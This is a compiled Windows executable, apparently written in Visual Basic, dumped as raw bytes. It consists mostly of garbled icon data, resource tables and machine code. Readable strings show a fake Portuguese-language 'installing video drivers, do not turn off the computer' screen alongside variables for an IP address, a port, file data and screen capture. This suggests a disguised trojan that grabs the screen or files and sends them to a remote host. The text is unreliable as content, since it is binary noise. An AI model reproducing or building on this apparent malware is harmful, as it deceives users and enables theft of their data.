   @                                �    �  ��    � � �  �� ��� ��� �    �  ��    � � �  �� ���                                                                  fffffffffffff` �������������` ~~~~~~~~~~~~~` ��������������  �~~~~~~~~~~~~w  ��������������  �~~~~~~~~~~~~x ��������������`~~~~~~~~~~~~~p`�������������`~~~~~~~~~~~~~�`��������������`�~~~~~~~~~~~~~`��������������`�~~~~~~~~~~~~x`���������������`�wwwwwwwwwwww�` �~~~~~~~~~~~~` �������������` �~~~~~~~~~~~~` �������������  �~~~~~~x�����   �������        �~~~~x          ������          ����                                        �������������  �   �   �   �   �   �   �   �   �   �   �                       �   �   �   �   �  �  � �� ?�� �� ����������(                �                       �    �  ��    � � �  �� ��� ��� �    �  ��    � � �  �� ���                          ������  ������ �~~~~p�����瀀�~~~~~�����������������������~~���������� ����    ��            ��  ��  �   �   �   �   �               �   �   �  �  ��  ��  (       @          �                                                                                                                                                                                                                                                                                                   	                                                                                                                    
   *   ;   1   #                                                                                                       }�N Nh~ �   �   �   f   L   8   &                                                                                       ���P���M��� ��� b�� >R� &�   �   �   m   R   :   (         	                                                             ���g�������m���S���7��������� k�� G_� %�   �   �   s   Y   @   ,                                                       ���;�������{���r���r���r���r���]���A���$������ s�� Ql� (6�   �   �   z   `   E   .                                         ���L�����������v���v���v���v���v���v���v���v���h���J���-������ {�� Zx� 3D�   �   �   w   @                                   ���y���p�������|���|���|���|���|���|���|���|���|���|���|���|���t���V���7������ ��� >R�   v   $                               ���w���0�����������������������������������������������������������������������k���
���   �   F                              ���y���$�����������������������������������������������������������������������n���O��� 2C�   n                             0��ǀ���;�����������������������������������������������������������������������o�������q��   �   :                          1��ɉ���M���>�������������������������������������������������������������������p�������B��� $�   b                         *������V���0�������������������������������������������������������������������r����������� Yv�   �   1                      +�������_���M�������������������������������������������������������������������s�����������>��� �   V                      Y�������f���f���\���������������������������������������������������������������u��������������� F^�   �   )                  ]�������m���m���7���������������������������������������������������������������y���������������)���   �   M                  	`�������t���t���t���J���-���^���`�����������������������������������������������|������������������� =Q�   w   !            ��Hd�������~���~���~���~���~���~���~���g���W���@���h������������������������������������������������������   �   >   	         ��Ht�����������������������������������������������m���h��������������������������������������������������� $�   d           ��I����������������������������������������������������u���.���e���`��������������������������������������� q��   a           ��H������������������������������������������������������������������������q���_���������I���p����������� ���   (   
         ��U��������������������������������������������������������������������������������&���   �   +    ��! ��D z�(               ��!u�������������������������������������������������������������������������������&���   �   (                                   �����������������������������������|���H���T���y�������������������������������;���   m                                       ��B{������������������������������� Yw�   %       ��2 ��E �Æ ���;���E���k���4���                                               �ʡR���C���p������������������   %   	                                                                                                 ��! ��D ��G f�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ���������������� ��� ��  ��  ?�  ?�  �  �  �  �  �  �  �  �  �  �  �   �   �  �  �  ?�  ?�  ������������������(       @                                Spy fff `il ~is  �j~ 9|� Fv� Ls� @y� rz� -�� 3�� �� �� &��  �� 1�� #�� )�� 7�� �� �� �� �� �� �� 5�� $�� $�� +�� 0�� &�� -�� .�� >�� ;�� 0�� 7�� 7�� ;�� 7�� ;�� \�� i�� E�� Z�� C�� B�� M�� P�� `�� p�� {�� ~�� @�� A�� L�� \�� Y�� M�� e�� q�� ~�� �� O�� J�� J�� ]�� ^�� V�� W�� _�� S�� V�� ]�� _�� g�� `�� d�� h�� h�� k�� e�� p�� u�� y�� {�� f�� g�� m�� h�� m�� n�� o�� k�� w�� p�� y�� y�� r�� s�� u�� t�� t�� v�� y�� {�� |�� q�� u�� |�� ~�� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� Yls 8�|����.�|�eK t  l� x�I 0N ����    �UK `s6lC `s(�-\� ę� ���    ����(�-�`s                `s                      (       @          �                                                                                                                                                                        532�                       5N�]J(
�                   5)�leeeeL9               5:��jjjjjjjj\D"	           5dU�ppppppppppppiG*          5a ΅���������������`         7c�����������������^B	         s|+w����������������_�        s~=$ˏ��������������b�1�        .�K&����������������e��       }M=z���������������f��0       <�YY;͢�������������g���
       E�]]'z��ž����������k���      O�hhhC"F4w��ѳ������m���{      P�qqqqqqqZH8Qҿ���������     V�����������[R�����ŀ����y�     V������������o#T4w��������     V�����������������nIvUw�,     V�������������������!          V�������������������!          6��������Ar@Wx������%           X�ò����    tttt?S>            6u/////-                                                                                                                                                    ����������������������� ��� ��  ��  �  ?�  ?�  �  �  �  �  �  �  �  �  �  �  �  �  �  ����������������������(                 @                                                                            
   !   *   *   *   *   *   *   *   *   *   *   *   !   
   
   8   ~   �   �   �   �   �   �   �   �   �   �   �   ~   8   !������}��{��x��u��r��
p��m��k��i��g�� f��   �   ~!���f����������n���n���n���n���n���n���n���n���:������� f��   �$���f���&�������z���z���z���z���z���z���z���z���C�������g��   �'���f���,���������������������������������������M�������i��   �)���f���2���������������������������������������V�������k��   �,���n���3���������������������������������������_�������m��   �.���z���,�����������������������������������������������
p��   u0�����������,���,���,���,���,���,���'���#���������������   !2�����������������������������������������������{��   u   "   3���������������������������$���!������������}��   !   	        3�������������������)���   8   
                               3���2���0���.���   !   
                                                                                            �  �                                              �  ��  ��  (                                         f� g� i� k� m� 
p� r� u� x� {� }� �� �� �� �� �� !�� #�� $�� &�� '�� )�� ,�� .�� 0�� 2�� 3�� :�� C�� M�� V�� _�� f�� n�� z�� ��� ��� ��� ��� ��� ��� fff \�� i�� E�� Z�� C�� B�� M�� ��   8 2�|!   �8   8 p���   8 �    �-$� p"�|��|��|   ,��       ^�� V�� W�� _�� S�� V�� ]�� _�� g�� `�� d�� h�� h�� k�� e�� p�� u�� y�� {�� f�� g�� ��h�� m�� n�� o�� k�� w�� p�� y�� y��   �s�� u�� t�� t�� v�� y�� {�� |�� q�� u�� |�� (�-��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���    ��� ��� ��� ��� ��� ��� ��� ��-��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���   8  �-  8   8 x8 4� ��|8 m�|@   (�-(�-  ����  �-x8 ��� (�-��� ��� ��� ����� ��-��� (�-��� �   !   ��� ��� ��-     �-���          �-  (�-p�  8   8 �|t            �   x� |� l� �|p�|����m�|lI   8     (�-@   \� (�-(�-8�|����.�|�eK t  l� x�I 0N ����   �UK (�-6lC (�-p�\� ,�� ���    ����p�h�-              (�-                    (                 @                            +++++++++++++  
	++")########)+")$$$$$$$$)+")&&&&&&&&)+")(((((((( )+#)))))))))!)+$*********%*+&% ('''''*****+  *))))*    ****                                                     ��  �  �                                    ��  ��  ��  ��    �,J+  B $ ; �=    Command1  Ok `	���    ��| MS Sans Serif�    Timer1 0u  @  <   ��    Label1 � Aguarde enquanto o Windows instala os novos drivers da Placa de Video e o monitor Plug and Play. N�o desligue o computador neste intervalo. d��9  %   ��| Verdana�      p�@ D�@ d�@                 ��@     p�@             <�@     x�@ ��@ �E@ �E@ ��@ ��@ 0�@     ��@     P�@ X�@ l�@     ��@     ��@     ��@ ĸ@     �@ ̸@     ��@ ĸ@ ̸@                     ��@ �@ �@ (�@     l�@ �@ p�@ 
   x�@        �    �@     ح@ ��@ $�@     ��@ ��@ ĸ@ ��@ �@     L�@ P�@ T�@ X�@ \�@ `�@ ��@ ��@ ĸ@ ̸@ ��@ �@     �E@ �\@ �\@ �\@ tN@ �\@ �\@ �E@ �E@ �\@ �\@ �\@ @b@ Lb@ Xb@ db@ ! ��       h��@             (  % ��       h��@             &             `��@                 ��       h��@             (   - ��        h��@             0  A ��       `�@             #   \         `��@                  ��       `��@                ! ��       h��@             (    �         `��@                  ���       `��@                  �         `��@                 ���       `��@             0  1 ��        hĪ@             (    $         `��@                - ��       h��@             (   ���        `��@             0& 5 ��       `�@             0( 1 ��        h��@             0    ��       h��@             (    ,        `��@             &    �$        `��@                  ��       `��@                ) ��       h��@             (    ��       `��@                ��       `�@             0/   	��       `��@                 ��       `��@             0    ,$        `��@                  D        `��@                  0       	 `��@                  @        `��@                 ��      
 `�@             0&   4        `��@                  8        `��@                  <        `��@                  ��       `��@                U ��       `Ȫ@             3 ,-@  E ��  p�@  `P�@             (���   Q ��       `�@             #3 ,-@ ) ��       `��@             ((��( = ��      
 `̫@             ((���# % ��       `��@             (((((( M ��       `�@             ((3,-@ I ��       `��@             3  ,-@ 5 ��       `0�@             ((&#   ���       ` �@             =  `�@ /    ��       `Ъ@             3  ,-@ 0   9 ��      	 `$�@             =  ظ@ �#  ,�@ ������������l�@ ��@ ����������@ �����@ ����                                                        L7@ ����           `�@     @�@ ��@ ��@             P          �+@ ����            ��@     ��@ ��@ ��@             @          �:@ ����          L�@     �@ ��@ ت@             �          ,-@ ����          ܵ@     x�@ ��@ �@             �        T1@ ����    =      p�@     �@ ��@ �@             \                                                                                                                                                                    h�@ Ĳ@ ��@ @�@ �@ Я@         �@ `�@ ��@ ̰@ ��@ 8�@ �@ �@ ��@ ��@ ��@ <�@                                                                                      �@ ��@ (�@ L�@ d�@ D�@ ��@ ��@ �@ ��@ ܬ@ ��@ t�@ L�@ ��@ \�@                                                                                         Ԯ@ H�@ $�@ Ա@ ��@ ��@                                         ��@ ��@                                                                                                                                                                                                                                                         |?@ ����    H�@             ����    HE@ �D@ $LB HE@ pE@ (LB HE@ �E@ ,LB msgz    iDint   HE@ @J@ 0LB Pic Cancel  TheImage    FileName    IpStr   PortInt wData   FileP   `\@ ,\@ 4LB lWidth  lHeight iBitCount   ha@ �a@ 8LB TheStdPicture   lHDC    lSrcLeft    lSrcTop lDestLeft   lDestTop    eRop    Vertical    Degrees vData   H1  V1  H2  V2  H3  V3  value       caminho HE@ `f@ <LB HE@ xf@ @LB ����������������U���h�@ d�    Pd�%    ��   ��d��SVW�e��E� @ �E�    �E�    �E��UR�Q�E�   hN@ �E�P��sB �E�   j��sB �E�   �M�����   �E�   f�E�  ��D@ �M��<tB �pK@ �M��<tB �E�P�M�Q�U�R��D �ЍM���tB P�E�P�ttB Pj �ؑ����|�����rB ��|����M��U�R�E�P�M�Q�U�Rj�DtB ���   �E�   �Ef�8��   �E�   f�E�  ��D@ �M��<tB ��M@ �M��<tB �M�Q�U�R�E�P�!D �ЍM���tB P�M�Q�ttB Pj �7�����|�����rB ��|����U��E�P�M�Q�U�R�E�Pj�DtB ���E�   �M��M��<tB �E�	   �   ����t�����t����   sǅ\���    ��hsB ��\����E�P��rB P�M�Q�U�R�ttB P�E��t���P�T�����rB �M�Q�U�R��sB �M���tB �E�
   �E�   �E�   �E�P��rB ���P  �E��E�   �   ����t�����t����   sǅX���    ��hsB ��X����U��t���R�tB �E��E�   ��|���P�M��EP�RX��t�����t��� } jXh�D@ �MQ��t���R� sB ��T����
ǅT���    �E�P��|���QjJ�U�R裉����x�����rB ��x����E��E�   �U��M���rB h7�@ ��M�Q�U�R�E�P�M�Qj�DtB ��ÍM���rB �M���tB �U���|�����|���Pj �sB ËM��EP�R�E��M�d�    _^[��]� �tB �U���h�@ d�    Pd�%    ��   �ESVW��e�3��E�X@ P�}��Q�UW�}܉}ȉ}��}��}��}��}��}��:�K����5�rB �E���j�9����E���賋���E��֋E�P�݋���E��֋U�M��M��M��2QV����   ;�}� sB h�   h@J@ VP���� sB 9=�KB uh�KB hDN@ �(tB �5�KB �E�PV��R;�}jh4N@ VP�ӋE��U�RP������   ;�}h�   hTN@ VP��9=�KB uh�KB hDN@ �(tB �5�KB �M�QV��P;�}jh4N@ VP�ӋE��M�QP����RP;�}jPhTN@ VP�ӋU��5�tB �E�h  � WWR���E�P��P�E�WWP���������rB �U��M܉u��E�   ��rB �M��U�QRj��rB ���hb�@ �#�E�t	�M���rB �E��M�PQj��rB ��ÍM��%�rB ËEP��R�E�MȋU�_��M�^[�P�UԉH�M�P�E�d�    ��]� �����U���h�@ d�    Pd�%    �   ��^��SVW�e��E�h@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   hdN@ j ��tB P�U�R�sB P�E��HP�sB �M���tB �E�   �$sB �E�   �L@B Q�;�����rB �E�   h�[@ �UR��tB P�E�P�sB �M�Q�y  �M���tB �E�   �ڀ  �E�    h��@ �
�M���tB �ËU��MQ�P�E��M�d�    _^[��]� ���������������U���h�@ d�    Pd�%    ��   �}]��SVW�e��E�@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB ǅ|����KB �
ǅ|����KB ��|�����M��U�R�E���U�R�Q�E��}� }jh4N@ �E�P�M�Q� sB ��x����
ǅx���    �UĉU��E�P�M���E�P�RP�E��}� }jPhtV@ �M�Q�U�R� sB ��t����
ǅt���    f�E�  ��D@ �M��<tB ��[@ �M��<tB �E�P�M�Q�U�R�E�P��< �ЍM���tB P��rB �ЍM���tB �M�Q�U�R�E�P�M�Qj�DtB ���M���tB �E�   �U�R��rB ���B  �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB ǅp����KB �
ǅp����KB ��p�����M��U؉U��E�   �E�P�   �}[���̋U���E��A�U��Q�E��A�M���E�P�R<�E��}� }j<h4N@ �M�Q�U�R� sB ��l����
ǅl���    �EĉE��E�    �M�Q�U�R�sB �E�   �XtB P�E�P�sB �E��M�Q�U���M�Q�P�E��}� }jh�[@ �U�R�E�P� sB ��h����
ǅh���    3Ƀ}� ����f�M��M���tB �U�����   �E�   h,-@ ��sB P�E�P�sB P�M��HQ�sB �M���tB �E�	   �U�zH u �E��HPh,-@ �(tB �M��H��d�����U��H��d�����d�����M�f�E�  �U�R�E�P�M�Q�U���M�Q�P8�E��}� }j8hdN@ �U�R�E�P� sB ��`����
ǅ`���    �E�   h�a@ j ��tB P�M�Q�sB h)�@ �%�U�R�E�P�M�Q�U�Rj�DtB ���M���tB ÍM���tB �M���tB ËE��UR�Q�E��M�d�    _^[��]� �����U���h�@ d�    Pd�%    �   �Y��SVW�e��E� @ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   �E�Q�U��LR�sB �E�   �E��M��T�<tB �M��EP�R�E��M�d�    _^[��]� ������������U���h�@ d�    Pd�%    �d   �]X��SVW�e��E�8@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   hT1@ ��sB P�E�P�sB P�M��PQ�sB �M���tB �E�   �E�   �U�R�E�HP�U�BP�Q�R�E��}� }jh0b@ �E�HPQ�U�R� sB �E���E�    �E�   �E�    �E�    �E�    �E�    �E�   �E�   �E�P�M�Q�U�R�E�P�M�Q�U�R�E�HP�U�BP�Q�R$�E��}� }j$h0b@ �E�HPQ�U�R� sB �E���E�    �E�   �E�P�M�QL�E�HL�R�P(�E��}� }j(hdN@ �M�QLR�E�P� sB �E���E�    �M�Q�U�BL�M�QL�
P�Q�E��}� }jhdN@ �U�BLP�M�Q� sB �E���E�    �U�R�E�HL�U�BL�Q�R �E��}� }j hdN@ �E�HLQ�U�R� sB �E���E�    �E�    �E�    �EЉEȋMԉM̍U�R�E�P�M�Q�U�R�E�P�M�Q�U�BP�M�QP�
P�Q(�E��}� }j(h0b@ �U�BPP�M�Q� sB �E���E�    �E�   �U��TR�E��UR��$  �E�   �E�P�M��TQ�U�BP�M�QP�
P�Q4�E��}� } j4h0b@ �U�BPP�M�Q� sB ��|����
ǅ|���    �E�	   hdN@ j ��tB P�U�R�sB P�E��LP�sB �M���tB �E�
   h0b@ j ��tB P�M�Q�sB P�U��PR�sB �M���tB h��@ �
�M���tB �ËE��UR�Q�E��M�d�    _^[��]� �������������̃��D$V�t$ �T$�RVP�D$    �D$    ��(  f�|$ t"�j P��tB �L$�t$Q�D$@  �psB 3�^��� ��U���h�@ d�    Pd�%    ��SV�u3�W�=�rB �E�E�E؋�e�P�E��@ �ׅ�~9�M�j'Q�u��E�@  �tB �ЍM���tB P��3ҍM�����ډU���tB h��@ �
�M���tB �ËEf�M�_^f��M�3�d�    [��]� U���h�@ d�    Pd�%    ��   �}S��SVW�e��E�@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �Uf�B@ �E�   �E��UR��  P�E�P�sB ��|����=�KB  uh�KB hDN@ �(tB ǅ`����KB �
ǅ`����KB ��`�����U��E�P�M���E�P�R�E��}� }jh4N@ �M�Q�U�R� sB ��\����
ǅ\���    �ẺE��M�Q�U���M�Q�PP�E��}� }jPhTN@ �U�R�E�P� sB ��X����
ǅX���    �M�Q��|������|���Q���   ��x�����x��� }&h�   h@J@ ��|���R��x���P� sB ��T����
ǅT���    �M�Q�U�Rj��rB ���E�   �E��UR��  P�E�P�sB ��|����=�KB  uh�KB hDN@ �(tB ǅP����KB �
ǅP����KB ��P�����U��E�P�M���E�P�R�E��}� }jh4N@ �M�Q�U�R� sB ��L����
ǅL���    �ẺE��M�Q�U���M�Q���   �E��}� } h�   hTN@ �U�R�E�P� sB ��H����
ǅH���    �M�Q��|������|���Q���   ��x�����x��� }&h�   h@J@ ��|���R��x���P� sB ��D����
ǅD���    �M�Q�U�Rj��rB ���E�   �=�KB  uh�KB hDN@ �(tB ǅ@����KB �
ǅ@����KB ��@�����M��U�R�E���U�R�Q�E��}� }jh4N@ �E�P�M�Q� sB ��<����
ǅ<���    �ỦU��E�P�M���E�P�RP�E��}� }jPhtV@ �M�Q�U�R� sB ��8����
ǅ8���    f�E�  ��D@ �M��<tB ��[@ �M��<tB �E�P�M�Q�U�R�E�P�0 �ЍM���tB P��rB �E��E�   �M�Q�psB �U�R�E�P�M�Q�U�Rj�DtB ���M���tB �M���rB �E�   �=�KB  uh�KB hDN@ �(tB ǅ4����KB �
ǅ4����KB ��4�����M��U�R�E���U�R�Q�E��}� }jh4N@ �E�P�M�Q� sB ��0����
ǅ0���    �ỦU��E�P�M���E�P�RP�E��}� }jPhtV@ �M�Q�U�R� sB ��,����
ǅ,���    f�E�  ��D@ �M��<tB �hd@ �M��<tB �E�P�M�Q�U�R�E�P�. �ЍM���tB P��rB �E��E�   �M�Q�psB �U�R�E�P�M�Q�U�Rj�DtB ���M���tB �M���rB �E�   h  zċE��UR�Q|�E��}� }j|h�D@ �EP�M�Q� sB ��(����
ǅ(���    �E�	   h  zċU��MQ�Pt�E��}� }jth�D@ �UR�E�P� sB ��$����
ǅ$���    �E�
   3ҍM��<tB �M�Q�v  �M���tB �E�   h�[@ �UR��tB P�E�P�sB �M�Q�g  �M���tB �E�   �E�4@B �E�@  �U�R�E�P�4sB �M�Q�U�R�LsB f�E�'�E�P��rB �ЍM���tB �M�Q�U�R�E��UR��  �E��}� } h  h�D@ �EP�M�Q� sB �� ����
ǅ ���    �M���tB �U�R�E�Pj��rB ���E�    �h��@ �B�M�Q�U�R�E�P�M�Qj�DtB ���U�R�E�Pj��rB ���M�Q�U�Rj��rB ���ËE��UR�Q�E��M�d�    _^[��]� ������������U���h�@ d�    Pd�%    �X   �K��SVW�e��E��@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �U�BX���d  �E�   f�E�  ��D@ �M��<tB �|d@ �M��<tB �M�Q�U�R�E�P�+ �ЍM���tB f�E�  �MЉM��E�    �U��M���tB �U�R�E�P�M��EP���  �E��}� }h�  h�D@ �MQ�U�R� sB �E���E�    �E�P�M�Q�U�R�E�Pj�DtB ���E�   f�E� ��d@ �M��<tB �M�Q�U�R�E��UR���  �E��}� }h�  h�D@ �EP�M�Q� sB �E���E�    �M���tB �E�   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �U���E��MQ�U�R�sB P�E���U�R�Q�E��}� }jh4N@ �E�P�M�Q� sB �E���E�    �M���tB �E�   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �U���E��=�@B  uh�@B h�+@ �(tB �E��@B ��E��@B �M��R�E�P�sB P�M���E�P�R�E��}� }jh4N@ �M�Q�U�R� sB �E���E�    �M���tB ��E�	   �Ef�@X  �E�    h��@ �%�M�Q�U�R�E�P�M�Qj�DtB ���M���tB �ËU��MQ�P�E��M�d�    _^[��]� �����U���h�@ d�    Pd�%    �d   �MH��SVW�e��E�@@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   �E�P�M��EP�RX�E��}� }jXh�D@ �MQ�U�R� sB �E���E�    3ҍM��<tB j �E�P�M�Q�U�P�M�R�Xg  �L@B �M���tB �E�   �=L@B �tj�E�   �E��UR��  P�E�P�sB �E�j��M���E�P�R\�E��}� }j\he@ �M�Q�U�R� sB �E���E�    �M���tB �h  �E�   f�E�  ��D@ �M��<tB �|d@ �M��<tB �E�P�M�Q�U�R�v' �ЍM���tB f�E�  �EЉE��E�    �U��M���tB �M�Q�U�R�E��UR���  �E��}� }h�  h�D@ �EP�M�Q� sB �E���E�    �U�R�E�P�M�Q�U�Rj�DtB ���E�   f�E� ��d@ �M��<tB �E�P�M�Q�U��MQ���  �E��}� }h�  h�D@ �UR�E�P� sB �E���E�    �M���tB �E�	   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �M���U��EP�M�Q�sB P�U���M�Q�P�E��}� }jh4N@ �U�R�E�P� sB �E���E�    �M���tB �E�
   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �M���U��=�@B  uh�@B h�+@ �(tB �E��@B ��E��@B �E��Q�U�R�sB P�E���U�R�Q�E��}� }jh4N@ �E�P�M�Q� sB ��|����
ǅ|���    �M���tB h�@ �%�U�R�E�P�M�Q�U�Rj�DtB ���M���tB �ËE��UR�Q�E��M�d�    _^[��]� ���������U���h�@ d�    Pd�%    �$   �=D��SVW�e��E�@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �Uf�BB  �E�   �E��UR��  P�E�P�sB �E�j �M؋�E�P�R\�Eԃ}� }j\he@ �M�Q�U�R� sB �E���E�    �M���tB �E�    h)�@ �
�M���tB �ËE��UR�Q�E��M�d�    _^[��]� �����U���h�@ d�    Pd�%    �,   �C��SVW�e��E��@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   �E��UR��  P�E�P�sB �E�j �M؋�E�P�R\�Eԃ}� }j\he@ �M�Q�U�R� sB �E���E�    �M���tB �E�   �E��UR��  �E؃}� }h  h�D@ �EP�M�Q� sB �E���E�    �E�   �U��MQ��  P�U�R�sB �E�j��E؋�U�R�Q\�Eԃ}� }j\he@ �E�P�M�Q� sB �E���E�    �M���tB h��@ �
�M���tB �ËU��MQ�P�E��M�d�    _^[��]� ���������������U���h�@ d�    Pd�%    ��   �mA��SVW�e��E� @ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   �E��UR��  P�E�P�sB �E��M�Q�U���M�Q���  �E��}� }h�  h@J@ �U�R�E�P� sB �E���E�    �=�KB  uh�KB hDN@ �(tB ǅ|����KB �
ǅ|����KB ��|�����U��E�P�M���E�P�R�E��}� }jh4N@ �M�Q�U�R� sB ��x����
ǅx���    �E��E��M�Q�U���M�Q�PP�E��}� }jPhtV@ �U�R�E�P� sB ��t����
ǅt���    f�E�  ��D@ �M��<tB ��[@ �M��<tB �MĉM��E�    �U�R�E�P�M�Q�U�R�X  �ЍM���tB P��rB �ЍM���tB P�E�P�M�Q�sB P��rB �E��}� }�U�R��rB ��p����
ǅp���    �E�P�M�Q�U�R�E�P�M�Qj�DtB ���U�R�E�P�M�Qj��rB ���E�   �U��MQ��   �E��}� } h   h�D@ �UR�E�P� sB ��l����
ǅl���    �E�   �=�KB  uh�KB hDN@ �(tB ǅh����KB �
ǅh����KB ��h�����U��E�P�M���E�P�R�E��}� }jh4N@ �M�Q�U�R� sB ��d����
ǅd���    �EȉE��M�Q�U���M�Q�PP�E��}� }jPhtV@ �U�R�E�P� sB ��`����
ǅ`���    f�E�  ��D@ �M��<tB �hd@ �M��<tB �M�Q�U�R�E�P�M�Q� �ЍM���tB P��rB �ЍM���tB �U�zH u �E��HPh,-@ �(tB �M��H��\�����U��H��\����E�P��\���Q�U��MQ��  �E��}� } h  h�D@ �UR�E�P� sB ��X����
ǅX���    �M�Q�U�R�E�P�M�Q�U�Rj�DtB ���M���tB �E�   �E��UR��  �E��}� } h  h�D@ �EP�M�Q� sB ��T����
ǅT���    h��@ �;�U�R�E�P�M�Q�U�R�E�Pj�DtB ���M�Q�U�R�E�P�M�Qj��rB ���ËU��MQ�P�E��M�d�    _^[��]� ��������������U���h�@ d�    Pd�%    �0   �M<��SVW�e��E�@@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �U��MQ��  P�U�R�sB �E�P�M�Q�U��MQ���  �Eȃ}� }h�  h�D@ �UR�E�P� sB �E���E�    �M���tB �M���rB �E�    h$�@ ��M���tB �M���rB �ËM��EP�R�E��M�d�    _^[��]� ����������U���h�@ d�    Pd�%    ��   �;��SVW�e��E�p@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB ǅ@����KB �
ǅ@����KB ��@������|����M�Q��|������|���Q�P��x�����x��� }#jh4N@ ��|���R��x���P� sB ��<����
ǅ<���    �M���t����U�R��t������t���R�QP��p�����p��� }#jPhtV@ ��t���P��p���Q� sB ��8����
ǅ8���    f�E�  ��D@ �M��<tB �hd@ �M��<tB �U�R�E�P�M�Q�A �ЍM���tB �=�KB  uh�KB hDN@ �(tB ǅ4����KB �
ǅ4����KB ��4������l����M�Q��l������l���Q�P��h�����h��� }#jh4N@ ��l���R��h���P� sB ��0����
ǅ0���    �M���d����U�R��d������d���R�QP��`�����`��� }#jPhtV@ ��d���P��`���Q� sB ��,����
ǅ,���    f�E�  ��D@ �M��<tB �$e@ �M��<tB �U���H����E�    �E�P�M�Q�U�R�E�P� �ЍM���tB P��rB �ЍM���tB P�M�Q��H����M���tB P��rB �ЍM���tB P�HtB �U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ��0�M�Q�U�Rj��rB ���E�   f�E� �8e@ �M��<tB �E�P�M�Q�U��MQ���  ��|�����|��� }#h�  h�D@ �UR��|���P� sB ��(����
ǅ(���    �M���tB �E�   �=�KB  uh�KB hDN@ �(tB ǅ$����KB �
ǅ$����KB ��$������|����E�P��|������|���P�R��x�����x��� }#jh4N@ ��|���Q��x���R� sB �� ����
ǅ ���    �E���t����M�Q��t������t���Q�PP��p�����p��� }#jPhtV@ ��t���R��p���P� sB ������
ǅ���    f�E�  ��D@ �M��<tB �hd@ �M��<tB �M�Q�U�R�E�P�� �ЍM���tB �Mĉ�D����E�    �U�R��D����M���tB P��rB �ЍM���tB Pjj�j �tB �E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ���M���tB �E�   j�,tB P�E�P�\sB �M�Q��rB �ЍM���tB �M���rB �E�   j�U�Rj �tsB �E�   j�`sB �E�	   f�E�  ��D@ �M��<tB �De@ �M��<tB f�E�  ��D@ �M��<tB �\e@ �M��<tB �E�P�M�Q�U�R� �ЍM���tB P�E�P��rB �ЍM���tB P�M�Q�U�R�E�P�r �ЍM���tB P��rB �E��E�   �M�Q�L@B R�6\  �E�P�M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB �� �M���rB �E�
   �M��EP��  P�M�Q�sB ��|���j���|������|���Q�P\��x�����x��� }#j\he@ ��|���R��x���P� sB ������
ǅ���    �M���tB �E�   �M��EP��  P�M�Q�sB ��|���j ��|������|���Q�P\��x�����x��� }#j\he@ ��|���R��x���P� sB ������
ǅ���    �M���tB �E�    hv�@ �T�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ��0�E�P�M�Qj��rB ���M���rB ÍM���tB ËU��MQ�P�E��M�d�    _^[��]� ��������U���h�@ d�    Pd�%    ��  ��2��SVW�e��E��@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   j��sB �E�   �E�����ǅ���@  j�����Q��d���R��tB ��d�����������rB �E�   fǅ����  ��D@ �M��<tB ��e@ �M��<tB ������P�M�Q�U�R� ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ��������t�E�   �Uf�BX �=  �E�   fǅ����  ��D@ �M��<tB ��e@ �M��<tB ������P�M�Q�U�R�� ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ���������$  �E�   fǅ���� ��e@ �M��<tB ������R�E�P�MQ��d���R��" ��d�����������rB �M���tB �E�	   fǅ����  ��D@ �M��<tB ��e@ �M��<tB ������P�M�Q�U�R�� ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ����������
  �E�
   �U�B@���  �E�   �M�Q�Y����rB �E�   �U��U��E�   �E��E��E�   �M��EP��  P��x���Q�sB ������������R�������������R�Qp������������ }#jph@J@ ������P������Q� sB ��P����
ǅP���    fǅ���� ��e@ �M��<tB ������R�E�P�MQ��d���R�H! fǅ���� ��e@ �M��<tB ������P�M�Q�UR��T���P�! �M��EP��  P��t���Q�sB ������������R�������������R�Qx������������ }#jxh@J@ ������P������Q� sB ��L����
